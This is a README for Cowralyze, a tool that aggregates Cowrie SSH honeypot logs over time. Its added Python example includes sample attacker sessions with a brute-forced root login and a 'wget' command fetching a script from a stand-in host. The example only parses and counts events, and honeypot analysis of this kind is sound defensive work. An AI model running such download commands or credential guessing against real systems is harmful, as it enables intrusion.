Cowralyze


Cowralyze is a command-line Map-Reduce tool for analyzing Cowrie honeypot log files, stored on remote servers or in local folders, over time. It also produces visualizations and statistics from that data.

Usage

The tool reads multiple Cowrie log files from a local or remote folder path and generates a cumulative information file and visualizations from them. The result is a set of statistics describing how every event type changes over time. Run python3 cowralyze.py --help to list the available commands with a description of each. Commands can also be traced by session ID or by source IP address, and Sankey command-chain plots can be generated for individual log files.

Motivation

This project was developed as part of my Bachelor's Thesis, Longitudinal Analysis of SSH Honeypots. Many honeypot tools exist, but they typically concentrate on high-level aggregated statistics rather than on anomalies visible in individual logs.
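The pipeline described above, as an added example that is not Cowralyze's own code: a minimal map-reduce over two constructed Cowrie JSON log files (the field names eventid, session, src_ip, input and timestamp follow Cowrie's JSON output; the events, IP addresses and session IDs themselves are made up), computing per-event-type percentage changes between consecutive files, tracing commands by session ID or source IP, and deriving the weighted command-to-command edge list a Sankey command-chain plot is drawn from. Malformed lines are skipped rather than aborting the run, because a truncated log on one of hundreds of sensors should not stop the whole analysis. All function names are this example's own.

```python
"""Map-reduce style aggregation of Cowrie JSON event logs (added example, not Cowralyze code)."""
import json
from collections import Counter, defaultdict

# Constructed sample data: two Cowrie JSON log files, one event object per line.
LOG_DAY1 = """\
{"eventid":"cowrie.session.connect","session":"a1","src_ip":"203.0.113.5","timestamp":"2024-01-01T10:00:00Z"}
{"eventid":"cowrie.login.failed","session":"a1","src_ip":"203.0.113.5","username":"root","password":"123456","timestamp":"2024-01-01T10:00:01Z"}
{"eventid":"cowrie.login.success","session":"a1","src_ip":"203.0.113.5","username":"root","password":"toor","timestamp":"2024-01-01T10:00:02Z"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.5","input":"uname -a","timestamp":"2024-01-01T10:00:03Z"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.5","input":"wget http://198.51.100.7/x.sh","timestamp":"2024-01-01T10:00:04Z"}
{"eventid":"cowrie.session.closed","session":"a1","src_ip":"203.0.113.5","timestamp":"2024-01-01T10:00:05Z"}
"""

LOG_DAY2 = """\
{"eventid":"cowrie.session.connect","session":"b2","src_ip":"203.0.113.5","timestamp":"2024-01-02T09:00:00Z"}
{"eventid":"cowrie.login.success","session":"b2","src_ip":"203.0.113.5","username":"root","password":"toor","timestamp":"2024-01-02T09:00:01Z"}
{"eventid":"cowrie.command.input","session":"b2","src_ip":"203.0.113.5","input":"uname -a","timestamp":"2024-01-02T09:00:02Z"}
{"eventid":"cowrie.command.input","session":"b2","src_ip":"203.0.113.5","input":"wget http://198.51.100.7/x.sh","timestamp":"2024-01-02T09:00:03Z"}
{"eventid":"cowrie.session.file_download","session":"b2","src_ip":"203.0.113.5","url":"http://198.51.100.7/x.sh","timestamp":"2024-01-02T09:00:04Z"}
{"eventid":"cowrie.session.closed","session":"b2","src_ip":"203.0.113.5","timestamp":"2024-01-02T09:00:05Z"}
this line is not JSON (simulates a truncated write) and must be skipped, not crash the run
{"eventid":"cowrie.session.connect","session":"c3","src_ip":"198.51.100.9","timestamp":"2024-01-02T11:00:00Z"}
{"eventid":"cowrie.login.failed","session":"c3","src_ip":"198.51.100.9","username":"admin","password":"admin","timestamp":"2024-01-02T11:00:01Z"}
{"eventid":"cowrie.login.failed","session":"c3","src_ip":"198.51.100.9","username":"admin","password":"1234","timestamp":"2024-01-02T11:00:02Z"}
{"eventid":"cowrie.session.closed","session":"c3","src_ip":"198.51.100.9","timestamp":"2024-01-02T11:00:03Z"}
"""


def parse_events(text):
    """Parse one JSON-lines log file. Blank or malformed lines are skipped so that a
    partially written cowrie.json on one sensor does not abort the whole run."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(ev, dict) and "eventid" in ev:
            events.append(ev)
    return events


def map_counts(events):
    """Map step: histogram of event types for a single file."""
    return Counter(ev["eventid"] for ev in events)


def percent_change(prev, cur):
    """Relative change in percent; None when there is no baseline (type first seen)."""
    if prev == 0:
        return None
    return round((cur - prev) / prev * 100.0, 2)


def reduce_over_time(per_file_counts):
    """Reduce step: cumulative totals plus percentage change per event type between
    consecutive files. Files are expected in chronological order."""
    cumulative, changes, prev = Counter(), [], Counter()
    for counts in per_file_counts:
        cumulative.update(counts)
        changes.append({eid: percent_change(prev[eid], counts[eid])
                        for eid in set(prev) | set(counts)})
        prev = counts
    return cumulative, changes


def trace_commands(events, session=None, src_ip=None):
    """Commands typed per session, optionally filtered by session ID and/or source IP."""
    by_session = defaultdict(list)
    for ev in events:
        if ev.get("eventid") != "cowrie.command.input":
            continue
        if session is not None and ev.get("session") != session:
            continue
        if src_ip is not None and ev.get("src_ip") != src_ip:
            continue
        by_session[ev["session"]].append(ev.get("input", ""))
    return dict(by_session)


def command_chains(events):
    """Counts of consecutive command pairs within a session: the (source, target, weight)
    edge list a Sankey command-chain plot is built from."""
    edges = Counter()
    for cmds in trace_commands(events).values():
        for a, b in zip(cmds, cmds[1:]):
            edges[(a, b)] += 1
    return edges


if __name__ == "__main__":
    files = [parse_events(LOG_DAY1), parse_events(LOG_DAY2)]
    total, changes = reduce_over_time([map_counts(f) for f in files])
    print("cumulative:", dict(total))
    print("day 2 vs day 1 (%):", changes[1])
    print("commands from 203.0.113.5 on day 2:", trace_commands(files[1], src_ip="203.0.113.5"))
    print("command chains:", dict(command_chains([ev for f in files for ev in f])))
```

Each per-file Counter is small and independent, so the map step can run on each remote host and only the counters need to travel back; the reduce step then runs once over hundreds of files in order. A percentage change of None marks an event type with no baseline in the previous file, which is exactly the kind of per-log anomaly (here, the first file download) that a cumulative total alone would hide.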

Objective

The objective of this project is to provide a tool that gives a quick overview of the changes over time across possibly hundreds of Cowrie honeypots.

Statistics Overview

An HTML report gives the accumulated percentage changes over time, while result.html visualizes the whole dataset.